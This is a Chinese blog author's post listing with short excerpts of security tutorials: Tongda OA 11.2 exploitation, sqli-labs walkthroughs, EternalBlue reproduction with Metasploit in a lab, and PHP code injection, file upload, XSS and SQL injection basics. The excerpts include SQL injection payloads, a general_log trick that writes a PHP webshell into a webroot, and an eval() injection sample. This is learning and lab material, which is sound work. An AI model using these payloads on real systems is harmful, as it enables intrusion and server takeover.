- 博客(7)
- 收藏
- 关注
原创 通达OA11.2漏洞复现
漏洞发现在线搜索通达oa漏洞,发现通达OA前台任意用户登录漏洞https://blog.csdn.net/xuandao_ahfengren/article/details/110233044,成功进入后台。寻找文件上传点菜单–》系统管理–》数据库管理–》数据库脚本导入上传文件为shell.php内容如下:set global general_log = on;set global general_log_file =‘C://TDOA/webroot//abc.php’;select
2022-04-02 22:49:48 4561
原创 sqli-labs学习经验
Less_1字符型,单引号闭合Payload: ?id=-1’ union select 1,user(),version()–+Less_2数字型Payload: ?id=-1 union select 1,user(),version()–+Less_3‘) 闭合Payload: ?id=1’) and 1=2 union select 1,user(),version() --+Less_4“) 闭合Payload: ?id=1") and 1=2 union
2021-10-10 22:52:02 218
原创 MS17_010(永恒之蓝)漏洞复现
环境准备本次漏洞复现使用虚拟机环境进行:攻击机:kali IP地址:192.168.3.128靶机:windows7 64位 IP地址:192.168.3.141kali开启msfconsole使用msfconsole命令,当出现msf6 > 说明成功进入msf命令行。注:若是第一次开启msf,需要输入命令msfdb init 进行msf数据库初始化。使用msf自带db_nmap进行端口扫描使用命令:db_nmap -sT 192.168.3.141扫描目标主
2021-09-18 17:29:23 1303
原创 PHP代码注入基础
PHP代码注入基础漏洞原因相关函数及语句evalassertpreg_replacecall_user_fun动态函数`$a($b)`漏洞应用OS命令注入命令执行的常见函数systemexecshell_execpassthru反引号``漏洞利用漏洞原因漏洞原因:程序中有可执行的PHP代码的函数或语言结构,传入的参数客户端可以进行控制。相关函数及语句evaleval(); 会将字符串当作PHP代码执行。例:<?php$_str=$_GET['code'];eval($str);?&
2020-11-30 17:38:47 769
原创 文件上传漏洞浅谈
文件上传漏洞漏洞原因绕过前端限制及绕过服务器端检测-MIME类型漏洞原因web未对用户上传的文件进行严格的过滤,导致用户可以上传任意的文件,其中包含木马,病毒,恶意脚本或者WebShell等。绕过前端限制及绕过有些web应用的文件上传功能,仅用JS进行了检测,如检测文件后缀名等。所以可以很轻松的进行绕过。方法一:因为JS在浏览器运行,可以修改JS代码,甚至删除表单事件。方法二:使文件后缀名符合白名单策略,用burp抓包,然后修改后缀名即可。(先在浏览器修改后缀名为白名单规定内容,抓包后改回原后
2020-11-23 22:32:41 348
原创 浅谈XSS
XSS基础XSS的基本概念漏洞原因验证XSS漏洞存在反射型XSS存储型XSSDOM型XSS构造XSS代码XSS变换1.大小写转换:2.引号的使用3.用/代替空格4.在一些地方添加tab(水平制表符)和回车符,来绕过关键字的检测5.对标签属性进行编码6.拆分跨站7.双写绕过8.远程运用shellcode结语XSS的基本概念XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执
2020-11-20 17:48:54 642 1
原创 SQL注入基础
SQL注入基础SQL注入的基本原理:SQL注入的基本方式SQL注入的基本思路:1.判断属于字符型还是数字型闭合2.判断字段个数column3.闭合前后的SQL语句4.判断注入显示位置联合查询报错注入布尔盲注时间盲注堆叠查询宽字节注入二次注入SQL注入的基本原理:当程序员在编写SQL语言时直接将用户的输入与SQL语言进行连接,并且没有对用户的输入进行足够的过滤,使得用户可以通过注入恶意的SQL语句,从而修改数据库中的原有信息,获得网站的webshell,以及产生后门等一系列恶意操作。SQL注入的基本方式
2020-11-16 17:39:55 1906 4
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人